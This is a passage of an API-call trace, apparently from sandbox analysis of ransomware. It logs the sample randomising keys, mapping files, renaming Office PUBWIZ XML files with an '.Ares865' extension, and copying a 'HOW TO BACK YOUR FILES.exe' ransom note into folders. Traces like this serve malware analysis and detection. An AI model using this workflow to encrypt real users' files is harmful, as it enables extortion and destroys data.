CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.755] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.755] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.756] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4bd0, lpName=0x0) returned 0x120 [0067.757] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4bd0) returned 0x190000 [0067.758] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.759] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.759] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.760] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML.Ares865") returned 70 [0067.760] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\letthead.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\letthead.xml.ares865"), dwFlags=0x1) returned 1 [0067.761] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\LETTHEAD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\letthead.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.761] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=12446) returned 1 [0067.761] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.762] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.762] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.762] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x33a0, lpName=0x0) returned 0x120 [0067.764] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33a0) returned 0x190000 [0067.765] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.766] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.766] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.766] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML.Ares865") returned 66 [0067.767] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\main.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\main.xml.ares865"), dwFlags=0x1) returned 1 [0067.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MAIN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\main.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.768] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9876) returned 1 [0067.768] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.769] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x29a0, lpName=0x0) returned 0x120 [0067.770] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x29a0) returned 0x190000 [0067.771] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.772] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.772] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.773] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML.Ares865") returned 66 [0067.773] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu.xml.ares865"), dwFlags=0x1) returned 1 [0067.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\MENU.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\menu.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.774] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5002) returned 1 [0067.774] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.775] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1690, lpName=0x0) returned 0x120 [0067.777] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1690) returned 0x190000 [0067.778] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.779] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.779] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.782] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML.Ares865") returned 66 [0067.782] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news.xml.ares865"), dwFlags=0x1) returned 1 [0067.783] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\NEWS.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\news.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.783] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=16992) returned 1 [0067.783] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.784] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.784] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.787] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.788] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.788] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.789] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML.Ares865") returned 70 [0067.789] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcard.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcard.xml.ares865"), dwFlags=0x1) returned 1 [0067.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\POSTCARD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\postcard.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.790] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=39576) returned 1 [0067.790] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.791] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.791] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.795] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.796] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.796] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.797] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML.Ares865") returned 69 [0067.797] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\program.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\program.xml.ares865"), dwFlags=0x1) returned 1 [0067.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\PROGRAM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\program.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.799] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=620) returned 1 [0067.799] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.802] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.803] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.803] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.803] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML.Ares865") returned 64 [0067.803] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\qp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\qp.xml.ares865"), dwFlags=0x1) returned 1 [0067.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\QP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\qp.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.804] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=13286) returned 1 [0067.805] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.808] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.809] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.809] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.809] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML.Ares865") returned 68 [0067.809] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resume.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resume.xml.ares865"), dwFlags=0x1) returned 1 [0067.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\RESUME.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\resume.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.811] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2138) returned 1 [0067.811] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.812] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.812] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.814] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.815] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.815] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.816] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML.Ares865") returned 66 [0067.816] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign.xml.ares865"), dwFlags=0x1) returned 1 [0067.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIGN.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sign.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.820] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=10932) returned 1 [0067.821] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.821] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.821] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.824] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.825] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.825] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.826] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML.Ares865") returned 69 [0067.826] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webpage.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webpage.xml.ares865"), dwFlags=0x1) returned 1 [0067.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WEBPAGE.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\webpage.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.827] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=15722) returned 1 [0067.827] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.828] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.831] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.832] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.832] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.832] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML.Ares865") returned 70 [0067.832] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\withcomp.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\withcomp.xml.ares865"), dwFlags=0x1) returned 1 [0067.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WITHCOMP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\withcomp.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.834] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5910) returned 1 [0067.834] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.835] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.835] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.837] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.838] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.838] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.838] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML.Ares865") returned 69 [0067.838] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wordrep.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wordrep.xml.ares865"), dwFlags=0x1) returned 1 [0067.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\WORDREP.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\wordrep.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0067.839] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6228) returned 1 [0067.839] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.840] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.840] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.860] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.861] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.861] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.884] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA") returned="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA" [0067.891] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4a90 | out: hHeap=0x2b0000) returned 1 [0067.891] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0067.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA") returned 48 [0067.892] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA") returned="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA" [0067.892] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0067.892] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\how to back your files.exe"), bFailIfExists=1) returned 1 [0067.968] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0067.968] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59413f90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a04fa20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a04fa20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0067.968] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.968] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0067.969] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\PROOF", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft 